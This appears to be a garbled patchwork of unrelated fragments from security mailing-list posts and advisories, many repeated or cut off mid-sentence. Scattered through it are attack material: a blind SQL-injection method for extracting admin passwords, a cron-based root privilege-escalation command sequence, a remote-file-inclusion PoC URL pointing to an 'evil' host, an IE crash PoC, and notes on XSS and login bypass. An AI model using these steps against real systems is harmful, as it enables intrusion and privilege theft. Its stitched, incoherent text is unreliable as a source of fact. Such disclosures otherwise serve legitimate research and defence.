Of course
Probably you, for not having any information of what actually happened
and because you totally mixed Secunia advisory with ours decided to
send such email blaming us.
> And I'd like to ask ALL SECURITY RESEARCHERS (of course including
> Rodrigo and Wagner).
>
> For what do you research security? What is your "security"? To
> protect people from threat? Or throw people into crisis? Do you
> recognize effects of your halfway job like this case?
@Condition be true.
So we can replace @Condition with a query like
EXISTS (SELECT * FROM blazedb.dbo.aspnet_Membership WHERE
(LEN(Password) < 32) AND UserId=??)
and then brout force on the length and then on each character of the
password (Of course
we need first extract the user id from username by another query like
above and then fill ?? with
the user id of the admin which is the same process).
+--> Exploiting The Stored XSS Vulnerablity:
> Hi Kingcope,
>
> ....but if the 'sudoers' file is correctly configured then you would not
> have the appropriate sudo permission to run the 'sudoedit' as root.
>
> ....of course I'm assuming that the 'sudoers' file has not got the 'run
> any command' in it.
>
> If the sudoers file used is even the default then I would think you would
> get some error on the lines of:
>
this and immediately think "birthday paradox", but there is no "birthday
paradox" here: You aren't look for pairs in an ever-growing set,
you're looking for matches against a fixed set. If you use 30-bit
hashes - giving you about a 120KB table - the chance that any given
key happens to hash to something in the table is one in a billion,
now and forever. (Of course, if you use a given key repeatedly, and
it happens to be that 1 in a billion, it will hit every time. So an
additional table of "known good keys that happen to collide" is worth
maintaining. Even if you somehow built and maintained that table for
all the keys across all the systems in the world - how big would it
get, if only 1 in a billion keys world-wide got entered?)
IV. NOTES
---------------------------------------
* Here's a snippet of the final reply that I received from the vendor:
"Of course, it could be made safer and we know how to do it. But we have designed the softwares so that renaming admin folder gives us less work. As you know, the users should know the security issues as they will run this and not us."
V. SOLUTION
---------------------------------------
* There is no update released at this time. Avoidance of this software is recommended until an updated version is available.
- Gallery -- begins to scan all images in phone memory and card, and
crashes soon, obviously when it encounters nokiacrash.jpg. So, just
putting this file anywhere in the filesystem is Gallery DoS.
- Web Browser -- does nothing when typing file:///E:/nokiacrash.jpg, but
crashes upon <IMG SRC=nokiacrash.jpg> in HTML file (of course,
Settings->Page->Load Content have to be set to "Images" or "All",
otherwise IMG tags are skipped).
_________________________________________
Dmitry Yu. Bolkhovityanov
> this and immediately think "birthday paradox", but there is no "birthday
> paradox" here: You aren't look for pairs in an ever-growing set,
> you're looking for matches against a fixed set. If you use 30-bit
> hashes - giving you about a 120KB table - the chance that any given
> key happens to hash to something in the table is one in a billion,
> now and forever. (Of course, if you use a given key repeatedly, and
> it happens to be that 1 in a billion, it will hit every time. So an
> additional table of "known good keys that happen to collide" is worth
> maintaining. Even if you somehow built and maintained that table for
> all the keys across all the systems in the world - how big would it
> get, if only 1 in a billion keys world-wide got entered?)
- (NEW) Ads Management (Add, Edit & Delete)
- News management (add, edit & delete)
- Download management (add, edit & delete)
- Login
- Add administrator
- Logout (of course)
Member Panel Features:
- Automaticly views all your current characters when you login (name, level, kills etc)
- Change account password
- Delete account
Be aware of race conditions at boot via crond/atd/etc, and users with
references to existing directories (man lsof), but this may be an acceptable
workaround until a patch is ready for deployment.
(Of course you need to do this everywhere untrusted users can make links to
suid/sgid binaries. find(1) is your friend).
If someone wants to create an init script that would automate this at boot for
their distribution, I'm sure it would be appreciated by other administrators.
The difference here is that renaming the admin also offers a some mitigation against local (e.g., non-networked) attacks for when the same person that can't be bothered to lock their session is rewarded with the latest d1psh1t virus when they download their porn-mule update. Installing the OS on something other than C: and renaming the admin account (regardless of the password) thwarts (sound of water dripping) most common local-attack methods. Simple and effective.
IOW:
1. no, this is not a "vulnerability in software", but build process failure by the OEM. As others have pointed out, this is frequently done to allow "ease of recovery" for the user.
2. there is no expectation (sadly) that OEM will perform any sort of security configuration on their products; typically, this is what "Bob's Security Suite" is intended to accomplish (I know...)
3. anyone leaving their session unlocked when they're removed from it for any length of time is a fuul (IMHO). It takes barely more than 0 seconds to hit <WIN>-L as you move away from the keyboard. ..of course, this habit may be offset by a 4-character password policy...
-----Original Message-----
From: Mike Wilson [mailto:mwilson@amedisys.com]
Sent: Thursday, May 14, 2009 1:14 PM
> Hi Kingcope,
>
> ....but if the 'sudoers' file is correctly configured then you would not
> have the appropriate sudo permission to run the 'sudoedit' as root.
>
> ....of course I'm assuming that the 'sudoers' file has not got the 'run
> any command' in it.
>
> If the sudoers file used is even the default then I would think you would
> get some error on the lines of:
>
Title: Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities
0x01. Description:
Memory exhaustion of Firefox 3.6.3 (latest) <= makes firefox can't make texts into body element and then it crashed.
( raise exception using PoC #1, lower memory area read access violation using PoC #2 )
Ofcourse an variation PoC made NULL Pointer deref so may also could be code execution ( 0.1 % ). :-)
URL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt
Vendor Status: unpatched. ( to now... doesn't exists any reliable exploit so i disclosed to bugtraq firstly )
The appearance may vary depending on your font selection; see
http://lcamtuf.coredump.cx/switch/reference.jpg for a sample capture.
If you know the special role of "data:", this won't fool you. But most
browser users don't, even if they grasp the basics of URL syntax to
begin with (of course, that part itself is not true in all too many
cases).
PS. It is probably better known that a less convincing variant of this
can be achieved with javascript: URLs in MSIE and some other browsers.
IV. NOTES
---------------------------------------
* Here's a snippet of the final reply that I received from the vendor:
"Of course, it could be made safer and we know how to do it. But we have designed the softwares so that renaming admin folder gives us less work. As you know, the users should know the security issues as they will run this and not us."
V. SOLUTION
---------------------------------------
* There is no update released at this time. Avoidance of this software is recommended until an updated version is available.
# This results in creating a world writable file in the crontab directory.
$ ls -l /etc/cron.d/exploit
-rw-rw-rw- 1 root taviso 65 2010-10-21 14:22 /etc/cron.d/exploit
# Setup a cronjob to give us privileges (of course, there are dozens of other
# ways this could be exploited).
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit
# Wait a few minutes...
$ ls -l /tmp/exploit
---------
**********************************
ok, now we see the code in control/login.php file
and on this file i see the vulnerability code that can be used by attacker or anonymous to bypass the login section..
its also possible to gain the administrator access ( if you lucky ofcourse :D )
here the code on control/login.php file:
**********************************
<?php
Hi Kingcope,
....but if the 'sudoers' file is correctly configured then you would not
have the appropriate sudo permission to run the 'sudoedit' as root.
....of course I'm assuming that the 'sudoers' file has not got the 'run
any command' in it.
If the sudoers file used is even the default then I would think you would
get some error on the lines of:
> PoC :
>
> http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&
>cmd=id
*Of course* this does not work. Setting register_globals to "On" causes the
contents of the "superglobals" ($_SERVER, $_GET, $_COOKIES, etc.) to be
registered in the global variable namespace. But the superglobals
*themselves* are special. They shadow everything - you cannot define your own
$_SERVER array, nor can it be overridden with HTTP GET or POST values. If
that were possible, using the superglobals would be useless; all scripts
To test the mitigation, you can use this pared-down proof-of-concept:
[body onload="for(var i=0; i!=10000; i++) ev.srcElement"]
[img src=. onerror="ev=createEventObject(event); outerHTML++"]
(Of course, replace [ and ] with < and > above. The 'for' loop is
just a kludge to make it more likely to crash.)
If you're interested in researching the vulnerability (using this
PoC), breakpoint MSHTML!CImgElement::CImgElement, then run until
MSHTML!CTreeNode::CTreeNode is hit -- this tree node is freed during
WTF!? This looks like fix for PHP code execution vulnerability, but there are no such vulnerabilities!
Hey, Rodrigo and Wagner, do YOU see the above as fix for XSS? Really?
So, the XSS was not fixed in v11.6.1. Of course the exploit code that was posted by Rodrigo, was available in many site until February 14, 2012.
XSS vulnerability in WordPress and its plugin is too dangerous because if attacker gets full privileges of admin user by that vulnerability, he can write and execute any PHP code by using theme editing feature (if the target file is writable).
As you can see, Rodrigo has done is throwing every cforms users into crisis and nothing more.
Interesting (and serendipitous, at that <g>).
ISA Server 2004+ allows you to configure "allowed / denied methods" in any rule for which the web proxy is involved; effectively nullifying this attack.
..of course, this requires the web devs to communicate the minimum required methods for their site - something I've rarely seen expressed with any real authority.
Jim
-----Original Message-----
From: Arshan Dabirsiaghi [mailto:arshan.dabirsiaghi@aspectsecurity.com]
| > like this and immediately think "birthday paradox", but there is no
| > "birthday paradox" here: You aren't look for pairs in an
| > ever-growing set, you're looking for matches against a fixed set.
| > If you use 30-bit hashes - giving you about a 120KB table - the
| > chance that any given key happens to hash to something in the table
| > is one in a billion, now and forever. (Of course, if you use a
| > given key repeatedly, and it happens to be that 1 in a billion, it
| > will hit every time. So an additional table of "known good keys
| > that happen to collide" is worth maintaining. Even if you somehow
| > built and maintained that table for all the keys across all the
| > systems in the world - how big would it get, if only 1 in a billion
Hi there,
It works because there is "Content-Location" header in .mht file so
our malicious code will be there.
"Content-Location" is outside <html></html> so it will work only in IE
(with .htm extension ofcourse).
Example code of .mht file with XSS:
[...]
Content-Type: text/html;
: ---------
: **********************************
:
: ok, now we see the code in control/login.php file
: and on this file i see the vulnerability code that can be used by attacker or anonymous to bypass the login section..
: its also possible to gain the administrator access ( if you lucky ofcourse :D )
:
: here the code on control/login.php file:
:
: **********************************
: <?php
|
